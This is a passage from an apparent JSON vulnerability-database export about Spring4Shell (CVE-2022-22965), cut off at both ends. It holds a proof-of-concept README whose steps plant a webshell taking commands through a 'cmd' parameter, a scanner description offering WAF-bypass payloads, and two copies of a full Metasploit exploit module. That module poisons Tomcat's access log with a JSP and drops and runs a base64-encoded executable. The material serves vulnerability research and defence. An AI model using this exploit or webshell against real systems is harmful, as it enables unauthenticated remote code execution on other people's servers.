by Tomcat. There is nothing special about this application, it's a simple hello world that's based off [Spring tutorials](<https://spring.io/guides/gs/handling-form-submission/> \"Spring tutorials\" ).\n\nDetails: <https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities>\n\nHaving issues with the POC? Check out the LunaSec fork at: <https://github.com/lunasec-io/Spring4Shell-POC>, it's more actively maintained.\n\n## Requirements\n\n 1. Docker\n 2. Python3 + requests library\n\n## Instructions\n\n 1. Clone the repository\n 2. Build and run the container: `docker build . -t spring4shell && docker run -p 8080:8080 spring4shell`\n 3. App should now be available at <http://localhost:8080/helloworld/greeting>\n\n[](<https://github.com/reznok/Spring4Shell-POC/blob/master/screenshots/webpage.png?raw=true> \"Dockerized Spring4Shell \\(CVE-2022-22965\\) PoC application and exploit \\(7\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEgiSKKOBdAf-H6x6nvFmF2wHQ0WkAKdimGQcO3ortF_UVrOhKDkUDmIr4gxFzpaEaodNjEbpOo2z05EuGygz6K7atd6sXZYvXGfs60tMvLY5ZPxKOwuFrODicy7AbrL7kskqnDMETdZ2FPvJ1mD0gw2LxfG-qch-LSC8tBo7hIW-JM4Jj9jGhkehhhD>)\n\n 4. Run the exploit.py script: `python exploit.py --url \"http://localhost:8080/helloworld/greeting\"`\n\n[](<https://github.com/reznok/Spring4Shell-POC/blob/master/screenshots/runexploit_2.png?raw=true> \"Dockerized Spring4Shell \\(CVE-2022-22965\\) PoC application and exploit \\(8\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEhXbcvigqvcJMzQzqHzuPqv8kDD2hEASz5zefNLhrnslPL6PVh8EdqWR0NFrOVdonBf7kBvzydhbiiPpBmFXSQun215RFALW4ijb3ucOIgmJKqELuISNRn59h8q-FHSlsEeoc594Ns_vIAkKrrogsoVbif_ufTU9Udrr2Umykdeyz9b0o3y5DkRXVhj>)\n\n 5. Visit the created webshell! Modify the `cmd` GET parameter for your commands. (`http://localhost:8080/shell.jsp` by default)\n\n[](<https://github.com/reznok/Spring4Shell-POC/blob/master/screenshots/RCE.png?raw=true> \"Dockerized Spring4Shell \\(CVE-2022-22965\\) PoC application and exploit \\(9\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEgTxfQevfT3YeenETl-w22eGNM_pdTzRn-0Nr0fwMbrmE7CLOkf33fpWA0N4zEloY3M1qI7ja7sQ-MziwLKY0FoiMoJ1e1kPhHSTMnyCU8L358ZRZTXcLmZDM7U9FHf7YuvY_3Nu3l17zdYcxQC4C9UgkypJ82wWMrgZt1jZ1cS_-2kOH7GfPdZgu6F>)\n\n## Notes\n\n**Fixed!** ~~As of this writing, the [container](<https://www.kitploit.com/search/label/Container> \"container\" ) (possibly just Tomcat) must be restarted between exploitations. I'm actively trying to resolve this.~~\n\nRe-running the exploit will create an extra artifact file of {old_filename}_.jsp.\n\nPRs/DMs [@Rezn0k](<https://twitter.com/rezn0k> \"@Rezn0k\" ) are welcome for improvements!\n\n## Credits\n\n * [@esheavyind](<https://twitter.com/esheavyind> \"@esheavyind\" ) for help on building a PoC. Check out their writeup at: <https://gist.github.com/esell/c9731a7e2c5404af7716a6810dc33e1a>\n * [@LunaSecIO](<https://twitter.com/LunaSecIO> \"@LunaSecIO\" ) for improving the documentation and exploit\n * [@rwincey](<https://twitter.com/rwincey> \"@rwincey\" ) for making the exploit replayable without requiring a [Tomcat](<https://www.kitploit.com/search/label/Tomcat> \"Tomcat\" ) restart\n \n \n\n\n**[Download Spring4Shell-POC](<https://github.com/reznok/Spring4Shell-POC> \"Download Spring4Shell-POC\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T12:30:00", "type": "kitploit", "title": "Spring4Shell-POC - Dockerized Spring4Shell (CVE-2022-22965) PoC Application And Exploit", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T12:30:00", "id": "KITPLOIT:3050371869908791295", "href": "http://www.kitploit.com/2022/05/spring4shell-poc-dockerized.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T20:47:11", "description": "# [](<https://blogger.googleusercontent.com/img/a/AVvXsEiq83rixQ33OKbmoWJi89WYHdc4DrLKjaF4Fb_oNC9eI-0dinGfghgU-ON86t-dvUArvvR4Uytjd8t4wjK3r0hSR6SojDsdxtk5oTYh9zXEVVj_Vwr5Jv4R77tpdZamnECE8jW0wK86UlAO3xZNSDsr5XlvkezzB-JxjKcV1r204vACkoGhTZ5kDzKX>)\n\n#### \n\n\n#### A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities\n\n[](<https://camo.githubusercontent.com/50b8ab2234bbab2c18588a670936521d1ff5e59d5ca623a9a462da51a3ceafab/68747470733a2f2f646b68396568776b697363342e636c6f756466726f6e742e6e65742f7374617469632f66696c65732f38623637376131622d376335332d343062312d393333652d6531306635373163386262382d737072696e67347368656c6c2d44656d6f2e706e67> \"A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities \\(2\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEhwUOGEkZWllztaONh15l-vccNxhEwBTiFlTp4EjnrWMxaQLx2Jazoo4d04LSQWwsomwL48sBTjfRoxCS0VtEC6FgI6jUjnQBbh_-dcDCKxovaU-2Su5R2LIHzccE1YG7A-NPawwE7dEld8q-n6CbDiSLi9-bW_6pwV8bvM5HRiVN9UHYqE9Y71sv4c>)\n\n# Features\n\n * Support for lists of URLs.\n * Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).\n * Fuzzing for HTTP GET and POST methods.\n * Automatic validation of the [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) upon discovery.\n * Randomized and non-intrusive payloads.\n * WAF Bypass payloads.\n\n \n\n\n# Description\n\nThe Spring4Shell RCE is a critical vulnerability that FullHunt has been researching since it was released. We worked with our customers in scanning their environments for Spring4Shell and Spring Cloud RCE vulnerabilities.\n\nWe're open-sourcing an open detection scanning tool for discovering Spring4Shell (CVE-2022-22965) and Spring Cloud RCE (CVE-2022-22963) vulnerabilities. This shall be used by security teams to scan their infrastructure, as well as test for WAF bypasses that can result in achieving successful [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) of the organization's environment.\n\nIf your organization requires help, please contact (team at fullhunt.io) directly for a full attack surface [discovery](<https://www.kitploit.com/search/label/Discovery> \"discovery\" ) and scanning for the Spring4Shell vulnerabilities.\n\n# Usage\n\nManagement Platform. [\u2022] Secure your External Attack Surface with FullHunt.io. usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] optional arguments: -h, --help show this help message and exit -u URL, --url URL Check a single URL. -p PROXY, --proxy PROXY Send requests through proxy -l USEDLIST, --list USEDLIST Check a list of URLs. --payloads-file PAYLOADS_FILE Payloads file - [default: payloads.txt]. --waf-bypass Extend scans with WAF bypass payloads. --request-type REQUEST_TYPE Request Type: (get, post, all) - [Default: all]. --test-CVE-2022-22963 Test for [CVE-2022-22963](<https://www.kitploit.com/search/label/CVE-2022-22963> \"CVE-2022-22963\" ) (Spring Cloud RCE). \"&gt;\n \n \n $ ./spring4shell-scan.py -h \n [\u2022] CVE-2022-22965 - Spring4Shell RCE Scanner \n [\u2022] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. \n [\u2022] Secure your External Attack Surface with FullHunt.io. \n usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] \n \n optional arguments: \n -h, --help show this help message and exit \n -u URL, --url URL Check a single URL. \n -p PROXY, --proxy PROXY \n Send requests through proxy \n -l USEDLIST, --list USEDLIST \n Check a list of URLs. \n --payloads-file PAYLOADS_FILE \n Payloads file - [default: payloads.txt]. \n --waf-bypass Extend scans with WAF bypass payloads. \n --request-type REQUEST_TYPE \n Request Type: (get, post, all) - [Default: all]. \n --test-CVE-2022-22963 \n Test for CVE-2022-22963 (Spring Cloud RCE).\n\n## Scan a Single URL\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local\n\n## Discover WAF bypasses against the environment\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local --waf-bypass\n\n## Scan a list of URLs\n \n \n $ python3 spring4shell-scan.py -l urls.txt\n\n## Include checks for Spring Cloud RCE (CVE-2022-22963)\n \n \n $ python3 spring4shell-scan.py -l urls.txt --test-CVE-2022-22963 \n \n\n# Installation\n \n \n $ pip3 install -r requirements.txt \n \n\n# Docker Support\n \n \n git clone https://github.com/fullhunt/spring4shell-scan.git \n cd spring4shell-scan \n sudo docker build -t spring4shell-scan . \n sudo docker run -it --rm spring4shell-scan \n \n # With URL list \"urls.txt\" in current directory \n docker run -it --rm -v $PWD:/data spring4shell-scan -l /data/urls.txt\n\n# About FullHunt\n\nFullHunt is the next-generation attack surface management (ASM) platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more.\n\nFullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges.\n\n# Legal Disclaimer\n\nThis project is made for educational and ethical testing purposes only. Usage of spring4shell-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n# License\n\nThe project is licensed under MIT License.\n\n# Author\n\n_Mazin Ahmed_\n\n * Email: _mazin at FullHunt.io_\n * FullHunt: <https://fullhunt.io>\n * Website: <https://mazinahmed.net>\n * Twitter: <https://twitter.com/mazen160>\n * Linkedin: <http://linkedin.com/in/infosecmazinahmed>\n \n \n\n\n**[Download Spring4Shell-Scan](<https://github.com/fullhunt/spring4shell-scan> \"Download Spring4Shell-Scan\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-24T21:30:00", "type": "kitploit", "title": "Spring4Shell-Scan - A Fully Automated, Reliable, And Accurate Scanner For Finding Spring4Shell And Spring Cloud RCE Vulnerabilities", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-24T21:30:00", "id": "KITPLOIT:6278364996548285306", "href": "http://www.kitploit.com/2022/04/spring4shell-scan-fully-automated.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-24T15:43:11", "description": "Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.\n", "cvss3": {}, "published": "2022-04-07T13:22:18", "type": "metasploit", "title": "Spring Framework Class property RCE (Spring4Shell)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-13T13:16:01", "id": "MSF:EXPLOIT-MULTI-HTTP-SPRING_FRAMEWORK_RCE_SPRING4SHELL-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/spring_framework_rce_spring4shell/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking # It's going to manipulate the Class Loader\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Retry\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',\n 'Description' => %q{\n Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above\n and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable\n to remote code execution due to an unsafe data binding used to populate an object from request parameters\n to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the\n org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:\n class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can\n gain remote code execution.\n },\n 'Author' => [\n 'vleminator <vleminator[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-22965'],\n ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],\n ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']\n ],\n 'Platform' => %w[linux win],\n 'Payload' => {\n 'Space' => 5000,\n 'DisableNops' => true\n },\n 'Targets' => [\n [\n 'Java',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => %w[linux win]\n },\n ],\n [\n 'Linux',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux'\n }\n ],\n [\n 'Windows',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win'\n }\n ]\n ],\n 'DisclosureDate' => '2022-03-31',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Spring4Shell', 'SpringShell'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),\n OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),\n OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),\n ]\n )\n register_advanced_options [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def jsp_dropper(file, exe)\n # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.\n dropper = <<~EOS\n <%@ page import=\\\"java.io.FileOutputStream\\\" %>\n <%@ page import=\\\"java.util.Base64\\\" %>\n <%@ page import=\\\"java.io.File\\\" %>\n <%\n FileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false);\n oFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\"));\n oFile.flush();\n oFile.close();\n File f = new File(\\\"#{file}\\\");\n f.setExecutable(true);\n Runtime.getRuntime().exec(\\\"#{file}\\\");\n %>\n EOS\n\n dropper\n end\n\n def modify_class_loader(method, opts)\n cl_prefix = 'class.module.classLoader'\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'version' => '1.1',\n 'method' => method,\n 'headers' => {\n 'c1' => '<%', # %{c1}i replacement in payload\n 'c2' => '%>' # %{c2}i replacement in payload\n },\n \"vars_#{method == 'GET' ? 'get' : 'post'}\" => {\n \"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format]\n }\n })\n end\n\n def check_log_file\n print_status(\"#{peer} - Waiting for the server to flush the logfile\")\n print_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\")\n\n succeeded = retry_until_truthy(timeout: 60) do\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(@jsp_file)\n })\n\n res&.code == 200 && !res.body.blank?\n end\n\n fail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded\n\n print_good(\"#{peer} - Log file flushed\")\n end\n\n # Fix the JSP payload to make it valid once is dropped\n # to the log file\n def fix(jsp)\n output = ''\n jsp.each_line do |l|\n if l =~ /<%.*%>/\n output << l\n elsif l =~ /<%/\n next\n elsif l =~ /%>/\n next\n elsif l.chomp.empty?\n next\n else\n output << \"<% #{l.chomp} %>\"\n end\n end\n output\n end\n\n def create_jsp\n jsp = <<~EOS\n <%\n File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\");\n jsp.delete();\n %>\n #{Faker::Internet.uuid}\n EOS\n if target['Arch'] == ARCH_JAVA\n jsp << fix(payload.encoded)\n else\n payload_exe = generate_payload_exe\n payload_filename = rand_text_alphanumeric(rand(4..7))\n\n if target['Platform'] == 'win'\n payload_path = datastore['WritableDir'] + '\\\\' + payload_filename\n else\n payload_path = datastore['WritableDir'] + '/' + payload_filename\n end\n\n jsp << jsp_dropper(payload_path, payload_exe)\n register_files_for_cleanup(payload_path)\n end\n\n jsp\n end\n\n def check\n @checkcode = _check\n end\n\n def _check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))\n )\n\n return CheckCode::Unknown('Web server seems unresponsive') unless res\n\n if res.headers.key?('Server')\n res.headers['Server'].match(%r{(.*)/([\\d|.]+)$})\n else\n res.body.match(%r{Apache\\s(.*)/([\\d|.]+)})\n end\n\n server = Regexp.last_match(1) || nil\n version = Rex::Version.new(Regexp.last_match(2)) || nil\n\n return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)\n\n vprint_status(\"Detected #{server} #{version} running\")\n\n if datastore['HTTP_METHOD'] == 'Automatic'\n # prefer POST over get to keep the vars out of the query string if possible\n methods = %w[POST GET]\n else\n methods = [ datastore['HTTP_METHOD'] ]\n end\n\n methods.each do |method|\n vars = \"vars_#{method == 'GET' ? 'get' : 'post'}\"\n res = send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }\n )\n\n # setting the default assertion status to a valid status\n send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }\n )\n return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n prefix_jsp = rand_text_alphanumeric(rand(3..5))\n date_format = rand_text_numeric(rand(1..4))\n @jsp_file = prefix_jsp + date_format + '.jsp'\n http_method = datastore['HTTP_METHOD']\n if http_method == 'Automatic'\n # if the check was skipped but we need to automatically identify the method, we have to run it here\n @checkcode = check if @checkcode.nil?\n http_method = @checkcode.details[:method]\n fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?\n\n print_good(\"Automatically identified HTTP method: #{http_method}\")\n end\n\n # if the check method ran automatically, add a short delay before continuing with exploitation\n sleep(5) if @checkcode\n\n # Prepare the JSP\n print_status(\"#{peer} - Generating JSP...\")\n\n # rubocop:disable Style/FormatStringToken\n jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')\n # rubocop:enable Style/FormatStringToken\n\n # Modify the Class Loader\n print_status(\"#{peer} - Modifying Class Loader...\")\n properties = {\n payload: jsp,\n directory: datastore['PAYLOAD_PATH'],\n prefix: prefix_jsp,\n suffix: '.jsp',\n file_date_format: date_format\n }\n res = modify_class_loader(http_method, properties)\n unless res\n fail_with(Failure::TimeoutExpired, \"#{peer} - No answer\")\n end\n\n # No matter what happened, try to 'restore' the Class Loader\n properties = {\n payload: '',\n directory: '',\n prefix: '',\n suffix: '',\n file_date_format: ''\n }\n\n modify_class_loader(http_method, properties)\n\n check_log_file\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/spring_framework_rce_spring4shell.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2023-06-14T15:10:28", "description": "Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "zdt", "title": "Spring4Shell Spring Framework Class Property Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T00:00:00", "id": "1337DAY-ID-37692", "href": "https://0day.today/exploit/description/37692", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking # It's going to manipulate the Class Loader\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',\n 'Description' => %q{\n Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above\n and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable\n to remote code execution due to an unsafe data binding used to populate an object from request parameters\n to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the\n org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:\n class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can\n gain remote code execution.\n },\n 'Author' => [\n 'vleminator <vleminator[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-22965'],\n ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],\n ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']\n ],\n 'Platform' => %w[linux win],\n 'Payload' => {\n 'Space' => 5000,\n 'DisableNops' => true\n },\n 'Targets' => [\n [\n 'Java',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => %w[linux win]\n },\n ],\n [\n 'Linux',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux'\n }\n ],\n [\n 'Windows',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win'\n }\n ]\n ],\n 'DisclosureDate' => '2022-03-31',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Spring4Shell', 'SpringShell'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),\n OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),\n OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),\n ]\n )\n register_advanced_options [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def jsp_dropper(file, exe)\n # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.\n dropper = <<~EOS\n <%@ page import=\\\"java.io.FileOutputStream\\\" %>\n <%@ page import=\\\"java.util.Base64\\\" %>\n <%@ page import=\\\"java.io.File\\\" %>\n <%\n FileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false);\n oFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\"));\n oFile.flush();\n oFile.close();\n File f = new File(\\\"#{file}\\\");\n f.setExecutable(true);\n Runtime.getRuntime().exec(\\\"#{file}\\\");\n %>\n EOS\n\n dropper\n end\n\n def modify_class_loader(method, opts)\n cl_prefix = 'class.module.classLoader'\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'version' => '1.1',\n 'method' => method,\n 'headers' => {\n 'c1' => '<%', # %{c1}i replacement in payload\n 'c2' => '%>' # %{c2}i replacement in payload\n },\n \"vars_#{method == 'GET' ? 'get' : 'post'}\" => {\n \"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format]\n }\n })\n end\n\n def check_log_file\n print_status(\"#{peer} - Waiting for the server to flush the logfile\")\n print_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\")\n\n succeeded = retry_until_true(timeout: 60) do\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(@jsp_file)\n })\n\n res&.code == 200 && !res.body.blank?\n end\n\n fail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded\n\n print_good(\"#{peer} - Log file flushed\")\n end\n\n # Fix the JSP payload to make it valid once is dropped\n # to the log file\n def fix(jsp)\n output = ''\n jsp.each_line do |l|\n if l =~ /<%.*%>/\n output << l\n elsif l =~ /<%/\n next\n elsif l =~ /%>/\n next\n elsif l.chomp.empty?\n next\n else\n output << \"<% #{l.chomp} %>\"\n end\n end\n output\n end\n\n def create_jsp\n jsp = <<~EOS\n <%\n File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\");\n jsp.delete();\n %>\n #{Faker::Internet.uuid}\n EOS\n if target['Arch'] == ARCH_JAVA\n jsp << fix(payload.encoded)\n else\n payload_exe = generate_payload_exe\n payload_filename = rand_text_alphanumeric(rand(4..7))\n\n if target['Platform'] == 'win'\n payload_path = datastore['WritableDir'] + '\\\\' + payload_filename\n else\n payload_path = 